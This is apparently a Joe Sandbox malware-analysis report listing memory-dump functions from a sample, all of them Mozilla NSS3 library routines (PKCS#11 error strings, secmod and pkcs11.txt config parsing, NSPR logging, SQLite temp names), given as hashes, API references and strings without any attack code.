Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0142b911938a7ab2a6ffdc07b714e897b2428499fdf50b955be0bf525b90c772
Instruction ID: a2d02ee05d3f5ef734ad1ec8524bf1b977742da5b989d91fa1a361819114c8e5
Opcode Fuzzy Hash: 0142b911938a7ab2a6ffdc07b714e897b2428499fdf50b955be0bf525b90c772
Instruction Fuzzy Hash: 9C11BF787042058FCB10DF28C8806AA7BA6EF85368F148469D8198B741DB32E906CBB4

Function 6C5E3FF0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$Error
String ID:
API String ID: 2275178025-0
Opcode ID: 45d15ffd1802122291a8ebfdafa75012ad87965c580decd97affd7ffae0f6733
Instruction ID: b041d8201d32b9e05cdf4f3bdf0763f430da1cb82c9cd80521d6e69999b6b597
Opcode Fuzzy Hash: 45d15ffd1802122291a8ebfdafa75012ad87965c580decd97affd7ffae0f6733
Instruction Fuzzy Hash: 76F0BE70E047599BCB00DF29C49019ABBF4EF4E244F008219EC8AAB300EB30AAC4C7C5

Function 6C670D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: d5419d4b8a78becf68b8df28da99a57fcef2c9436cf557bd810c092ccb73dc5c
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: 13E0923A212254A7DB248E09C560AA97399DF82719FB5887DCC5D9FA01E733F80387B5

Function 6C59CC60 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f957b762c633e6be69ae042cc55de0791cefa08ba69e805dbf3d375031b809e
Instruction ID: 9fd4fcaf4bd3eea8924d5a3ccc14fd6bf4763cc04027528c48b42e71b23eaeb4
Opcode Fuzzy Hash: 3f957b762c633e6be69ae042cc55de0791cefa08ba69e805dbf3d375031b809e
Instruction Fuzzy Hash: 71C04838244608CFC704DA08E489AA43BA8AB09610B0400A8EA028B721DB21F800DA80

Function 6C5D1D60 Relevance: 84.2, APIs: 1, Strings: 47, Instructions: 210COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3( rv = %s,CKR_FUNCTION_REJECTED,?,6C5D1D46), ref: 6C5D2345

Strings

CKR_FUNCTION_NOT_PARALLEL, xrefs: 6C5D218D
CKR_OPERATION_CANCEL_FAILED, xrefs: 6C5D1F77
CKR_WRAPPED_KEY_INVALID, xrefs: 6C5D1FB5
CKR_STATE_UNSAVEABLE, xrefs: 6C5D2037
CKR_TOKEN_NOT_PRESENT, xrefs: 6C5D1F81
CKR_WRAPPED_KEY_LEN_RANGE, xrefs: 6C5D2319
CKR_DEVICE_REMOVED, xrefs: 6C5D2261
CKR_DEVICE_MEMORY, xrefs: 6C5D1FF3
CKR_ENCRYPTED_DATA_INVALID, xrefs: 6C5D226B
CKR_DEVICE_ERROR, xrefs: 6C5D229D
CKR_FUNCTION_CANCELED, xrefs: 6C5D1E73
CKR_OBJECT_HANDLE_INVALID, xrefs: 6C5D204D
CKR_OPERATION_ACTIVE, xrefs: 6C5D22B8
CKR_PIN_LEN_RANGE, xrefs: 6C5D2061
CKR_SIGNATURE_INVALID, xrefs: 6C5D20CF
CKR_TEMPLATE_INCONSISTENT, xrefs: 6C5D1EE1
CKR_PIN_INCORRECT, xrefs: 6C5D1D92
CKR_DOMAIN_PARAMS_INVALID, xrefs: 6C5D2015
CKR_RANDOM_SEED_NOT_SUPPORTED, xrefs: 6C5D22FF
CKR_TOKEN_RESOURCE_EXCEEDED, xrefs: 6C5D2293, 6C5D233F
CKR_TOKEN_WRITE_PROTECTED, xrefs: 6C5D1DE0
CKR_RANDOM_NO_RNG, xrefs: 6C5D22A7
CKR_OPERATION_NOT_INITIALIZED, xrefs: 6C5D1FD7
CKR_TEMPLATE_INCOMPLETE, xrefs: 6C5D1F95
CKR_INFORMATION_SENSITIVE, xrefs: 6C5D22B1
CKR_WRAPPING_KEY_TYPE_INCONSISTENT, xrefs: 6C5D232E
CKR_PIN_LOCKED, xrefs: 6C5D2075
CKR_MUTEX_NOT_LOCKED, xrefs: 6C5D2225
CKR_BUFFER_TOO_SMALL, xrefs: 6C5D2183
CKR_OK, xrefs: 6C5D1DFC
CKR_SIGNATURE_LEN_RANGE, xrefs: 6C5D20D9
CKR_CURVE_NOT_SUPPORTED, xrefs: 6C5D2179
CKR_SAVED_STATE_INVALID, xrefs: 6C5D1E56
rv = %s, xrefs: 6C5D2340
CKR_CRYPTOKI_NOT_INITIALIZED, xrefs: 6C5D2275
CKR_FUNCTION_REJECTED, xrefs: 6C5D2289
CKR_PIN_INVALID, xrefs: 6C5D2057
CKR_CRYPTOKI_ALREADY_INITIALIZED, xrefs: 6C5D227F
CKR_PIN_EXPIRED, xrefs: 6C5D206B
CKR_MUTEX_BAD, xrefs: 6C5D1F49
rv = 0x%x, xrefs: 6C5D2312
CKR_ENCRYPTED_DATA_LEN_RANGE, xrefs: 6C5D1F0F
CKR_WRAPPING_KEY_SIZE_RANGE, xrefs: 6C5D2327
CKR_WRAPPING_KEY_HANDLE_INVALID, xrefs: 6C5D2320
CKR_NEXT_OTP, xrefs: 6C5D222F
CKR_NEW_PIN_MODE, xrefs: 6C5D1E9F
CKR_TOKEN_NOT_RECOGNIZED, xrefs: 6C5D1F8B

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print
String ID: rv = %s$ rv = 0x%x$CKR_BUFFER_TOO_SMALL$CKR_CRYPTOKI_ALREADY_INITIALIZED$CKR_CRYPTOKI_NOT_INITIALIZED$CKR_CURVE_NOT_SUPPORTED$CKR_DEVICE_ERROR$CKR_DEVICE_MEMORY$CKR_DEVICE_REMOVED$CKR_DOMAIN_PARAMS_INVALID$CKR_ENCRYPTED_DATA_INVALID$CKR_ENCRYPTED_DATA_LEN_RANGE$CKR_FUNCTION_CANCELED$CKR_FUNCTION_NOT_PARALLEL$CKR_FUNCTION_REJECTED$CKR_INFORMATION_SENSITIVE$CKR_MUTEX_BAD$CKR_MUTEX_NOT_LOCKED$CKR_NEW_PIN_MODE$CKR_NEXT_OTP$CKR_OBJECT_HANDLE_INVALID$CKR_OK$CKR_OPERATION_ACTIVE$CKR_OPERATION_CANCEL_FAILED$CKR_OPERATION_NOT_INITIALIZED$CKR_PIN_EXPIRED$CKR_PIN_INCORRECT$CKR_PIN_INVALID$CKR_PIN_LEN_RANGE$CKR_PIN_LOCKED$CKR_RANDOM_NO_RNG$CKR_RANDOM_SEED_NOT_SUPPORTED$CKR_SAVED_STATE_INVALID$CKR_SIGNATURE_INVALID$CKR_SIGNATURE_LEN_RANGE$CKR_STATE_UNSAVEABLE$CKR_TEMPLATE_INCOMPLETE$CKR_TEMPLATE_INCONSISTENT$CKR_TOKEN_NOT_PRESENT$CKR_TOKEN_NOT_RECOGNIZED$CKR_TOKEN_RESOURCE_EXCEEDED$CKR_TOKEN_WRITE_PROTECTED$CKR_WRAPPED_KEY_INVALID$CKR_WRAPPED_KEY_LEN_RANGE$CKR_WRAPPING_KEY_HANDLE_INVALID$CKR_WRAPPING_KEY_SIZE_RANGE$CKR_WRAPPING_KEY_TYPE_INCONSISTENT
API String ID: 3558298466-1980531169
Opcode ID: 10a0d59f6efcd4160d1d92df7090e1cc84f2b19c1d941aa0f9d0e7e9ab92766e
Instruction ID: 63ba7211f91cf8ec7efa9d4f2084f0a857d6cc002178598e9a60f2b63c2c7f7c
Opcode Fuzzy Hash: 10a0d59f6efcd4160d1d92df7090e1cc84f2b19c1d941aa0f9d0e7e9ab92766e
Instruction Fuzzy Hash: 1C61463064F345C6EA1C8C4C8DAE36D31249B4B314F638937F1828EE60D695FE92469F

Function 6C605DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6C605E08
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C605E3F
PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6C605E5C
free.MOZGLUE(00000000), ref: 6C605E7E
free.MOZGLUE(00000000), ref: 6C605E97
PORT_Strdup_Util.NSS3(secmod.db), ref: 6C605EA5
_NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6C605EBB
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C605ECB
PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6C605EF0
free.MOZGLUE(00000000), ref: 6C605F12
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C605F35
PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6C605F5B
free.MOZGLUE(00000000), ref: 6C605F82
PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6C605FA3
PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6C605FB7
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C605FC4
free.MOZGLUE(00000000), ref: 6C605FDB
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C605FE9
free.MOZGLUE(00000000), ref: 6C605FFE
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C60600C
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C606027
PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6C60605A
PR_smprintf.NSS3(6C6DAAF9,00000000), ref: 6C60606A
free.MOZGLUE(00000000), ref: 6C60607C
free.MOZGLUE(00000000), ref: 6C60609A
free.MOZGLUE(00000000), ref: 6C6060B2
free.MOZGLUE(?), ref: 6C6060CE

Strings

noModDB, xrefs: 6C605EEA
secmod=, xrefs: 6C605FB1
forceSecmodChoice, xrefs: 6C605F55
readOnly, xrefs: 6C605E56
configDir=, xrefs: 6C605F9D
%s/%s, xrefs: 6C606055
pkcs11.txt, xrefs: 6C605F47, 6C605F7C, 6C60603A, 6C606053
secmod.db, xrefs: 6C605EA0
flags, xrefs: 6C605E3A, 6C605EC6, 6C605F30

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
API String ID: 1427204090-154007103
Opcode ID: e58d0417c2f2e4d650fc2710d3c6fac37e5389d8d6c6036633df4daaa5321ea7
Instruction ID: ec1b34a62526a6bfce89b3aa63f231ca34dceda7bf5993e368f2a441bd69d319
Opcode Fuzzy Hash: e58d0417c2f2e4d650fc2710d3c6fac37e5389d8d6c6036633df4daaa5321ea7
Instruction Fuzzy Hash: A491FAF0B042055BEF148F259E85BAA3BA49F0634CF080060EC56BBB42E735D955CBAE

Function 6C591D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON

Download Yara Rule

APIs

PR_NewLock.NSS3 ref: 6C591DA3

Part of subcall function 6C6698D0: calloc.MOZGLUE(00000001,00000084,6C590936,00000001,?,6C59102C), ref: 6C6698E5

PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6C591DB2

Part of subcall function 6C591240: TlsGetValue.KERNEL32(00000040,?,6C59116C,NSPR_LOG_MODULES), ref: 6C591267
Part of subcall function 6C591240: EnterCriticalSection.KERNEL32(?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C59127C
Part of subcall function 6C591240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C591291
Part of subcall function 6C591240: PR_Unlock.NSS3(?,?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C5912A0

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C591DD8
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6C591E4F
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6C591EA4
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6C591ECD
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6C591EEF
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6C591F17
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C591F34
PR_SetLogBuffering.NSS3(00004000), ref: 6C591F61
PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6C591F6E
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C591F83
PR_SetLogFile.NSS3(00000000), ref: 6C591FA2
PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6C591FB8
OutputDebugStringA.KERNEL32(00000000), ref: 6C591FCB
free.MOZGLUE(00000000), ref: 6C591FD2

Strings

NSPR_LOG_FILE, xrefs: 6C591F69
Unable to create nspr log file '%s', xrefs: 6C591FB3
all, xrefs: 6C591F0E
sync, xrefs: 6C591E46
%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n, xrefs: 6C591E27
, %n, xrefs: 6C591E6B
bufsize, xrefs: 6C591E9B
append, xrefs: 6C591EE6
NSPR_LOG_MODULES, xrefs: 6C591DAD
timestamp, xrefs: 6C591EC4

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
API String ID: 2013311973-4000297177
Opcode ID: 871f5aa54554b66dc9768091581150dd4411de3a1aedde21e1ffbd4748674476
Instruction ID: d27c6cc985749034781fc72dd5ac22dbcf086d3311ca5511e0602e4c9fd52133
Opcode Fuzzy Hash: 871f5aa54554b66dc9768091581150dd4411de3a1aedde21e1ffbd4748674476
Instruction Fuzzy Hash: 6C51A2B1E042A99BDF00DBE5DD44B9F7BBCAF01348F040568E816EBA40E770E518CB99

Function 6C676E50 Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C52CA30: EnterCriticalSection.KERNEL32(?,?,?,6C58F9C9,?,6C58F4DA,6C58F9C9,?,?,6C55369A), ref: 6C52CA7A
Part of subcall function 6C52CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C52CB26

memset.VCRUNTIME140(00000000,00000000,?,?,6C53BE66), ref: 6C676E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C53BE66), ref: 6C676E98
sqlite3_snprintf.NSS3(?,00000000,6C6DAAF9,?,?,?,?,?,?,6C53BE66), ref: 6C676EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C53BE66), ref: 6C676ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C53BE66), ref: 6C676EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C53BE66), ref: 6C676F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C53BE66), ref: 6C676F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C53BE66), ref: 6C676F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C53BE66), ref: 6C676FA6
sqlite3_snprintf.NSS3(?,00000000,6C6DAAF9,00000000,?,?,?,?,?,?,?,6C53BE66), ref: 6C676FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C53BE66), ref: 6C676FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C53BE66), ref: 6C676FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C53BE66), ref: 6C677014
sqlite3_free.NSS3(00000000,?,?,?,?,6C53BE66), ref: 6C67701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C53BE66), ref: 6C677030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C53BE66), ref: 6C67705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6C53BE66), ref: 6C677079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C53BE66), ref: 6C677097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C53BE66), ref: 6C6770A0

Strings

winGetTempname2, xrefs: 6C6770C4
winGetTempname5, xrefs: 6C677071
winGetTempname1, xrefs: 6C67708F
Pkl, xrefs: 6C6770A8
winGetTempname4, xrefs: 6C677046
mz_etilqs_, xrefs: 6C676F18

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: Pkl$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-3601446709
Opcode ID: 3a089268d266ed07862952d471995daeccacb8907521b1eb29c68c31ea3af231
Instruction ID: a0f3b0525245a006b6de738ad98f1cd0e664ab05cf9f21975ed1831d13384dc4
Opcode Fuzzy Hash: 3a089268d266ed07862952d471995daeccacb8907521b1eb29c68c31ea3af231
Instruction Fuzzy Hash: 88514AB1A042116BE72196309C55BFB36569BD3318F144938E80597BC2FB29E91EC2FA

Function 6C5D8E50 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 169COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_WrapKey), ref: 6C5D8E76
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D8EA4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D8EB3

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D8EC9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C5D8EE5
PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C5D8F17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D8F29
PR_LogPrint.NSS3(?,00000000), ref: 6C5D8F3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C5D8F71
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D8F80
PR_LogPrint.NSS3(?,00000000), ref: 6C5D8F96
PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C5D8FB2
PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C5D8FCD
PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C5D9047

Strings

hKey = 0x%x, xrefs: 6C5D8F5B, 6C5D8F6B
(CK_INVALID_HANDLE), xrefs: 6C5D8EAC, 6C5D8F1F, 6C5D8F79
hSession = 0x%x, xrefs: 6C5D8E8E, 6C5D8E9E
pWrappedKey = 0x%p, xrefs: 6C5D8FAD
nkl, xrefs: 6C5D8FEC, 6C5D9023
*pulWrappedKeyLen = 0x%x, xrefs: 6C5D9042
C_WrapKey, xrefs: 6C5D8E71
pulWrappedKeyLen = 0x%p, xrefs: 6C5D8FC8
pMechanism = 0x%p, xrefs: 6C5D8EE0
hWrappingKey = 0x%x, xrefs: 6C5D8F01, 6C5D8F11

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey$nkl
API String ID: 1003633598-1410028101
Opcode ID: af72ca7f8c7be015a257cc9a34f9132fd86702581f38b76daa1dd38c565f2746
Instruction ID: 90890a0483fd0a745b031e72c9ca1c423ed2a5f54dda8ebd5f4d56aee9442871
Opcode Fuzzy Hash: af72ca7f8c7be015a257cc9a34f9132fd86702581f38b76daa1dd38c565f2746
Instruction Fuzzy Hash: C65196B2701206EBDB009F54DD48F9A7B76EB8631CF055429F5086BA12DF30A918CB9F

Function 6C604FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000,00000000,00000001), ref: 6C605009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C605049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C60505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C605071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C605089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6050A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C6050B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2), ref: 6C6050CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6050D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6050F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C605103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C60511D
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C60512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C605145
